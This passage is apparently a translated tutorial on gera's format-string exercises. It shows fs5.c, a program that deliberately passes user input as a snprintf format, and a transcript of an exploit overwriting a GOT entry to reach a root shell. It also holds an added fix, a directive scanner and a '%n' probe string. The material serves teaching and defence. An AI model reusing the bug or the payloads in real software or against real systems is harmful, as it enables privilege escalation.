Insecure Programming Demonstrations: Format Strings (2)
2006-04-02 20:26:42 Source: WEB开发网
```c
execl("/home/user/gera/fs4", "fs4", evil_buffer, NULL);
}
```
Analysis of fs5.c
The source code for this example is as follows:
```c
/* fs5.c *
 * specially crafted to feed your brain by gera@core-sdi.com */
/* go, go, go! */
#include <stdio.h>

int main(int argv,char **argc) {        /* note: gera swaps the conventional names argc/argv */
    char buf[256];
    snprintf(buf,sizeof buf,argc[1]);   /* BUG: the user's argument is used as the format string */
    /* this line'll make your life easier */
    printf("%s\n",buf);
}
```
Finally, let us look at a classic format string vulnerability. It does not need much explanation: this overflow is entirely typical, and if you have any questions, read scut's excellent treatment (translator's note: the latest version is "format string -1.2"). Here the exact position is found automatically, purely for educational purposes; that is the reason for the comment on the last line (printf("%s\n",buf);). (Translator's note: this is to make automatic exact positioning easier; see alert7's article on automatic exact positioning.)
```
user@CoreLabs:~/gera$ ./exp_fs5
Reading stack frames...
frame 01 --> 40016478
frame 02 --> 00000001
frame 03 --> bffff8f8
frame 04 --> 41414141
Exact match found. Stack pop is: 4
_deregister address in GOT is: 0x080495ac
shellcode address in stack is: 0xbfffffcd
??000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
sh-2.05# exit
exit
user@CoreLabs:~/gera$
```
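As an added example (not from gera's fs5.c, the exploit, or the translator), the vulnerable call from fs5.c beside its one-token fix, a scanner that flags format directives in untrusted data, and a legal use of %n that shows why that directive is the one behind the GOT overwrite in the transcript. The function names and the probe string are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* fs5.c passes argc[1] to snprintf as the FORMAT: snprintf(buf, sizeof buf, argc[1]);
 * The fix is a constant format with the user data passed as an argument. */
static void render_safe(char *out, size_t n, const char *untrusted) {
    snprintf(out, n, "%s", untrusted);      /* a "%x" inside untrusted stays literal */
}

/* Counts conversion directives in s, as a reviewer or input filter would before
 * letting a string anywhere near a printf-family format. "%%" is a literal percent
 * and is not counted; *has_n (if non-NULL) is set when a %n directive is present. */
static int count_directives(const char *s, int *has_n) {
    int count = 0;
    if (has_n) *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }             /* escaped '%' */
        count++;
        p++;                                            /* past the '%' */
        /* skip flags, width, precision, positional and length modifiers */
        while (*p && strchr("-+ #0123456789.$*hlLqjzt", *p)) p++;
        if (*p == 'n' && has_n) *has_n = 1;             /* %n WRITES to memory */
        if (!*p) break;                                 /* truncated directive */
    }
    return count;
}

static int has_n_directive(const char *s) {
    int n; count_directives(s, &n); return n;
}

/* The write primitive behind the GOT overwrite in the transcript: %n stores the
 * count of characters emitted so far into an int*, and the field width of an
 * earlier directive sets that count. Legal here (constant format, own pointer). */
static int n_directive_writes(void) {
    int written = -1;
    char buf[64];
    snprintf(buf, sizeof buf, "%20u%n", 7u, &written);
    return written;                                     /* 20: the width, not 7 */
}

int main(void) {
    char buf[256];
    const char *probe = "AAAA%08x%08x%08x%08x%n";       /* constructed sample input */
    render_safe(buf, sizeof buf, probe);
    printf("%s\ndirectives=%d has_n=%d\n", buf, count_directives(probe, NULL), has_n_directive(probe));
    printf("%%20u%%n stored %d\n", n_directive_writes());
    return 0;
}
```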